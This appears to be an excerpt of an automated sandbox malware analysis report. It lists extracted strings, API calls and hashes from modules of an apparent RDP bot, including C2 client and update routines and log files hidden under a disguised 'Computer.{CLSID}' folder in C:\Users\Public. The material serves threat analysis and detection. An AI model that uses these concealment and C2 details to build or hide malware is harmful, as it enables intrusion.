                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: 4aa1df97a47ca316267ad6c5515689d8f9c9a5a1432f820d2ff1b5dd2c2cd85c
                                                                                                                  • Instruction ID: c5d1b502c9dd27284cbc076ba2a6cd55f8eb92566a952fc8d7fc937ffd801374
                                                                                                                  • Opcode Fuzzy Hash: 4aa1df97a47ca316267ad6c5515689d8f9c9a5a1432f820d2ff1b5dd2c2cd85c
                                                                                                                  • Instruction Fuzzy Hash: 6F418061E0CE4795FB119FA2E8403B82659BF5136CF4881FADA1D0A1B1DF7CE64AC340
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                                                                                                                  • API String ID: 39653677-1686225151
                                                                                                                  • Opcode ID: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
                                                                                                                  • Instruction ID: 7526bf0db11373b2bc3809e9e36e8b76b97d9fc5a62671ed7be948ab6da75e35
                                                                                                                  • Opcode Fuzzy Hash: 90beea7e8383602f11ba928d37b552c868a860ea5da908b62ebdf329eea09240
                                                                                                                  • Instruction Fuzzy Hash: 2B210B7290CBC345FB20FE15B804B7D9A904B16BE8FC88032DD0E5B793DDACA8548361
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                                                                                                                  • API String ID: 513531256-2729875187
                                                                                                                  • Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                                                                                                  • Instruction ID: f99a5d857b5765848f4539af630d82fa6adbb87993f446c2452b4fe9c1d2a4c8
                                                                                                                  • Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
                                                                                                                  • Instruction Fuzzy Hash: D9416C71B0CA4586F320AB17EAA03FE2260AB96FA4F5040F3DA4D577B5DF2CE5858700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                                                                                                                  • API String ID: 513531256-1680544107
                                                                                                                  • Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
                                                                                                                  • Instruction ID: 2f91b9f264d6804011115b047d715351ea34905a29cc2fe1fb90709bae031e44
                                                                                                                  • Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
                                                                                                                  • Instruction Fuzzy Hash: 8F418621A0CE8246FB20DB12EC643F92391BB987A0F5001B5DA0D477F5CFBCE6458748
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                                                                                                                  • API String ID: 513531256-3034662401
                                                                                                                  • Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                                                                                                  • Instruction ID: d8d13a389f0c98023c723322d2c90abe3455b60ebb1b693989feda0ffcb7a7e3
                                                                                                                  • Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
                                                                                                                  • Instruction Fuzzy Hash: 70415E62B0CE419AF320AB52E8543FA6261AFD6FA0F5000F7DA4D477A5DF3CE545C640
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                                                                                                                  • API String ID: 513531256-2115573132
                                                                                                                  • Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                                                                                                  • Instruction ID: cbb84ec3c0ee27ab64d3569b27f11ffeeaa09dfb884190c1ff80fe121be04b2f
                                                                                                                  • Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
                                                                                                                  • Instruction Fuzzy Hash: 9541BF71A0CE828AF321AB56E8443FE679AFB947A0F5001B4DA4D477B5CF7CE9858700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                                                                                                                  • API String ID: 513531256-2601447032
                                                                                                                  • Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                                                                                                  • Instruction ID: 929600df4509480c34adee906357661c9a0c6b851f52e2ffe05620e7123312d4
                                                                                                                  • Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
                                                                                                                  • Instruction Fuzzy Hash: C6418221A0CA8186FB20ABD6EC503BF22A9FB947A0F8411B5D94D877A5DF2DE5958700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                  • API String ID: 2918714741-1670302297
                                                                                                                  • Opcode ID: 823f9eb139ee9fd81949df31d6533de7a7a8e4b7c39e6833e41002169308d720
                                                                                                                  • Instruction ID: fd52d98c42b88982431593d718b7f4caa82c5c1759468377fbf2915be2d66ba6
                                                                                                                  • Opcode Fuzzy Hash: 823f9eb139ee9fd81949df31d6533de7a7a8e4b7c39e6833e41002169308d720
                                                                                                                  • Instruction Fuzzy Hash: E2217E62B0CE4396E751DF96E8407BA2361AB96FA4F4440B7EE4C47664DF3CE945C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                  • API String ID: 2887799713-3464183404
                                                                                                                  • Opcode ID: 4b4899b335b3e6d97c7936ea7dc83b6c3e1e4cd9547a80d32ae369b40ccdf5eb
                                                                                                                  • Instruction ID: d1c2ff1e74aa88b346367e45ee156a133fe501e86f3257471b68ee716d8ab250
                                                                                                                  • Opcode Fuzzy Hash: 4b4899b335b3e6d97c7936ea7dc83b6c3e1e4cd9547a80d32ae369b40ccdf5eb
                                                                                                                  • Instruction Fuzzy Hash: AB416C7190C69AC6FB24EF06A400B7DE6517F01BA8ED40133DD0E07690FEEDA686CA21
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                  • API String ID: 2018770650-4119452840
                                                                                                                  • Opcode ID: 2047d60fb5c13c1989b6da97ae385802d0952076c86f5f41a327e2344636ab28
                                                                                                                  • Instruction ID: 963c44d317de6452627089f16c1d20cf912ac47ed0d89bdde58ab5eaf15c6c96
                                                                                                                  • Opcode Fuzzy Hash: 2047d60fb5c13c1989b6da97ae385802d0952076c86f5f41a327e2344636ab28
                                                                                                                  • Instruction Fuzzy Hash: 5D31C572E0C28AC2FB60FF18A450EBCA1525F51375EE80533CD1E472D1ED9DA9859722
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsend
                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                  • Opcode ID: 094feadf84d9ca9e3155364a1ba31a33ab06d9b2b76804d2299b6ea95532df59
                                                                                                                  • Instruction ID: 2d2f4e230c17af244990d60e41d8ede3ff89d14ef05d63117f60b92790b3a919
                                                                                                                  • Opcode Fuzzy Hash: 094feadf84d9ca9e3155364a1ba31a33ab06d9b2b76804d2299b6ea95532df59
                                                                                                                  • Instruction Fuzzy Hash: F2210211F18D8385FA208B27ADA06B81642BF057F4F5403B0EC3C476FAEEADA545C304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsend
                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                  • Opcode ID: 9494e14ce3a27552937ae465d96f20451ee6982272dea73166048f5b9e9b3018
                                                                                                                  • Instruction ID: be9ce5f5256e94b605e00c3e4bb5368d6f87b2223661b4158f46cc57bb5fd12f
                                                                                                                  • Opcode Fuzzy Hash: 9494e14ce3a27552937ae465d96f20451ee6982272dea73166048f5b9e9b3018
                                                                                                                  • Instruction Fuzzy Hash: 85216F69B1CE52C1EA204B67A9806BA26527F57FF5F5403F3DC2D4B6F2DE2CA5458300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: 3ba9905c85f0b21fd7e894e96f07bcb23402eeca7c15dd9aa80b4b2fa724bb98
                                                                                                                  • Instruction ID: 88c1f4ac3ab5aac6b851bf4702eecee65f1a4c20e45b94b3386e9183d968b24d
                                                                                                                  • Opcode Fuzzy Hash: 3ba9905c85f0b21fd7e894e96f07bcb23402eeca7c15dd9aa80b4b2fa724bb98
                                                                                                                  • Instruction Fuzzy Hash: 7E116A71A1D942D6E7349F27A8008B9A658EF88774F105275E96E836B4DF7CD509CB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: 7898d053efd30122f79762812fd161f8bd09f82c0285f26850430d40275440a0
                                                                                                                  • Instruction ID: 5acc28f594b6c352ad009e451106d8846aaff561a7e9ad0e739aeef4233e2419
                                                                                                                  • Opcode Fuzzy Hash: 7898d053efd30122f79762812fd161f8bd09f82c0285f26850430d40275440a0
                                                                                                                  • Instruction Fuzzy Hash: 6F11967171CE4286F3209B2BA8040BA6660AF89F74F1056B7ED6D836B4DF7CD50A8B00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: 6ea6309f8952398e634868d392235a12f819b08b8aad9c59136ce9d2e99d613f
                                                                                                                  • Instruction ID: 5c80e1d7922338de2872fcc16766a4d2be12b818cec0b2e701f4f87dd99b6935
                                                                                                                  • Opcode Fuzzy Hash: 6ea6309f8952398e634868d392235a12f819b08b8aad9c59136ce9d2e99d613f
                                                                                                                  • Instruction Fuzzy Hash: E1116371A189424AE710AB17EC504A56761EF88764F204375E96E83AF8EFFCD909CB04
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                  • Opcode ID: d75a270e90b185d077b1882f88bf5ddc0587005d39dfd19ed2511a7d17e5abdd
                                                                                                                  • Instruction ID: af825ede857ea6450fc621586820f7c396fcd57002ed94fc56167ef69a5dc5c0
                                                                                                                  • Opcode Fuzzy Hash: d75a270e90b185d077b1882f88bf5ddc0587005d39dfd19ed2511a7d17e5abdd
